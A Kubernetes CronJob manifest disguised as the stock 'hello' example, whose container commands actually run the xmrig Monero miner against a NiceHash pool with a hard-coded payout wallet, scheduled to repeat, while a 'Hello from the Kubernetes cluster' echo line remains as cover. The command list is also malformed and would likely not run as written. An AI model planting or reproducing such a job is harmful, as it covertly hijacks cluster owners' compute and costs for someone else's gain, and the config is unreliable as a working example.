apiVersion: batch/v1
kind: CronJob
metadata:
  name: hello
spec:
  schedule: "* */1 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - cd xmrig-6.12.2
            - ./xmrig -o stratum+tcp://randomxmonero.usa-west.nicehash.com:3380 -u 3NwTqUpHyE1bQHF2n99pqMpxh55gfE8qbs -p x -k --nicehash -a rx/0
            - date; echo Hello from the Kubernetes cluster
          restartPolicy: OnFailure
